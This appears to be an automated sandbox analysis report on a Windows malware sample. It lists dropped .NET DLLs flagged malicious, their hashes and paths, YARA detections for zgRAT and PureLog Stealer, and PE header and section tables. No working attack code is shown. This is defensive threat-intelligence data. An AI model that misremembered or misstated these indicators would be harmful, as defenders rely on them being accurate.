                                                          MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                          SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                          SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                          SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33280
                                                          Entropy (8bit):5.634433516692816
                                                          Encrypted:false
                                                          SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                          MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                          SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                          SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                          SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):38400
                                                          Entropy (8bit):5.699005826018714
                                                          Encrypted:false
                                                          SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                          MD5:87765D141228784AE91334BAE25AD743
                                                          SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                          SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                          SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):24064
                                                          Entropy (8bit):5.492504448438552
                                                          Encrypted:false
                                                          SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                          MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                          SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                          SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                          SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):294912
                                                          Entropy (8bit):6.010605469502259
                                                          Encrypted:false
                                                          SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                          MD5:00574FB20124EAFD40DC945EC86CA59C
                                                          SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                          SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                          SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):24064
                                                          Entropy (8bit):5.4346552043530165
                                                          Encrypted:false
                                                          SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                          MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                          SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                          SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                          SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):64000
                                                          Entropy (8bit):5.857602289000348
                                                          Encrypted:false
                                                          SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                          MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                          SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                          SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                          SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):24576
                                                          Entropy (8bit):5.535426842040921
                                                          Encrypted:false
                                                          SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                          MD5:5420053AF2D273C456FB46C2CDD68F64
                                                          SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                          SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                          SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):41472
                                                          Entropy (8bit):5.6808219961645605
                                                          Encrypted:false
                                                          SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                          MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                          SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                          SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                          SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):36352
                                                          Entropy (8bit):5.668291349855899
                                                          Encrypted:false
                                                          SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                          MD5:94DA5073CCC14DCF4766DF6781485937
                                                          SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                          SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                          SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):24064
                                                          Entropy (8bit):5.492504448438552
                                                          Encrypted:false
                                                          SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                          MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                          SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                          SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                          SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):23552
                                                          Entropy (8bit):5.529329139831718
                                                          Encrypted:false
                                                          SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                          MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                          SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                          SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                          SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):34304
                                                          Entropy (8bit):5.618776214605176
                                                          Encrypted:false
                                                          SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                          MD5:9B25959D6CD6097C0EF36D2496876249
                                                          SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                          SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                          SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):34816
                                                          Entropy (8bit):5.636032516496583
                                                          Encrypted:false
                                                          SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                          MD5:996BD447A16F0A20F238A611484AFE86
                                                          SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                          SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                          SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):40448
                                                          Entropy (8bit):5.7028690200758465
                                                          Encrypted:false
                                                          SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                          MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                          SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                          SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                          SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):70144
                                                          Entropy (8bit):5.909536568846014
                                                          Encrypted:false
                                                          SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                          MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                          SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                          SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                          SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):342528
                                                          Entropy (8bit):6.170134230759619
                                                          Encrypted:false
                                                          SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                          MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                          SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                          SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                          SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):22016
                                                          Entropy (8bit):5.41854385721431
                                                          Encrypted:false
                                                          SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                          MD5:BBDE7073BAAC996447F749992D65FFBA
                                                          SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                          SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                          SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):38912
                                                          Entropy (8bit):5.679286635687991
                                                          Encrypted:false
                                                          SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                          MD5:9E910782CA3E88B3F87826609A21A54E
                                                          SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                          SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                          SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:ASCII text, with very long lines (555), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):555
                                                          Entropy (8bit):5.860578028117087
                                                          Encrypted:false
                                                          SSDEEP:12:ZrWy8At2zd8WHJudmOdGj7dk7P2yOR66q/u5VcKIpNo+8quyk:RWLDOGgsB7dKeFRxhDA8p
                                                          MD5:5FDC9DDE29B2598A735DD8A318AA6446
                                                          SHA1:F8E247CBB39EF4E6EC72C4E5E6721E53EA7A3CC5
                                                          SHA-256:CEABE1090F3ED53D19502A9AFB2CA9D202BD623A364C2FBC7BC1D38366B9DDCD
                                                          SHA-512:94CB18B27AD3CF77F7471253C0EFEBAD95C041D9472C65E03EB6F9A3ED53489AB00D5528B39FD5E71504BB91503FA05BCDC8480F974EA1BC6D8D650C7F448020
                                                          Malicious:false
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3879424
                                                          Entropy (8bit):7.837347017475398
                                                          Encrypted:false
                                                          SSDEEP:98304:wxy6buzFyyqatrjLQsf10YsOR+iI5XEcP8:wxmR4atrYsNdx3I5Xs
                                                          MD5:88340879F7B502B0EEE8F6147CDC70EB
                                                          SHA1:1510660A130FDCB57E2DCAD37C16CF1A966126D8
                                                          SHA-256:BCEFEDADA15B81B6470D80824651DAC64D52A568B459B6C1ADE8D0DCDDCF2F05
                                                          SHA-512:D3518EB922315743BF16624E256A6BCC4B930723786CF34CCB40AFB901C2EDE1A19C0ACDB21EE4C5BBDA6541A2B229C16A8AD66E861230E46634F30B8D3DB3ED
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Media\Characters\conhost.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Media\Characters\conhost.exe, Author: Joe Security
                                                          Process:C:\Windows\System32\PING.EXE
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):502
                                                          Entropy (8bit):4.618543484589417
                                                          Encrypted:false
                                                          SSDEEP:12:PrS5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:gdUOAokItULVDv
                                                          MD5:4DBEFFEDC5A0C766CC738CB031B97382
                                                          SHA1:A28348DF32AE7C992201A7893DDCCE39638F5DB6
                                                          SHA-256:D1C202BA26D1A32C2060CF1231E5CDA0621E84DB3EE32985C7151E0A2E2D081F
                                                          SHA-512:ACE73ECFFCCF8775525BD45FDDE356AE95FD8ED293F079E10AC7ECD0575EB302EF96AF9297BEFEE017120659CC598C4F33272A3A052D1951574776234A127709
                                                          Malicious:false
                                                          Preview:..Pinging 571345 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.792866797225971
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:kIdT4m0aa4.exe
                                                          File size:4'201'265 bytes
                                                          MD5:55a2312d6062e5bac6c5f62a0ee42fa2
                                                          SHA1:2271954571874366b20b329f202735959361a01c
                                                          SHA256:bce94981e91d899f670e4aa9b06e51f1bbff4960751481b373c119c8373ed481
                                                          SHA512:f9ec8f21b68dcec5e9c8916e87a1395a84efbcac8aae67b0c8c171391ac301ea330d47fa352fdcf60db78a979e9e6c380a6ae9a526772878b5a46fc16d0c2ced
                                                          SSDEEP:98304:ylxy6buzFyyqatrjLQsf10YsOR+iI5XEcP8e:cxmR4atrYsNdx3I5Xse
                                                          TLSH:BE16F10665914E37C2AD3F3184E7142D42B0DB61BA13EF1B3E5F20E5B9562A0DF262B7
                                                          Icon Hash:1515d4d4442f2d2d
                                                          Entrypoint:0x41f530
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                          Instruction
                                                          call 00007F8D008D1F6Bh
                                                          jmp 00007F8D008D187Dh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          push dword ptr [ebp+08h]
                                                          mov esi, ecx
                                                          call 00007F8D008C46C7h
                                                          mov dword ptr [esi], 004356D0h
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          and dword ptr [ecx+04h], 00000000h
                                                          mov eax, ecx
                                                          and dword ptr [ecx+08h], 00000000h
                                                          mov dword ptr [ecx+04h], 004356D8h
                                                          mov dword ptr [ecx], 004356D0h
                                                          ret
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          Programming Language:
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xdff8 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0x233c | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x64000 | 0xdff8 | 0xe000 | ba08fbcd0ed7d9e6a268d75148d9914b | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x72000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528 |
| PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495 |
| RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534 |
| RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585 |
| RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034 |
| RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816 |
| RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843 |
| RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195 |
| RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401 |
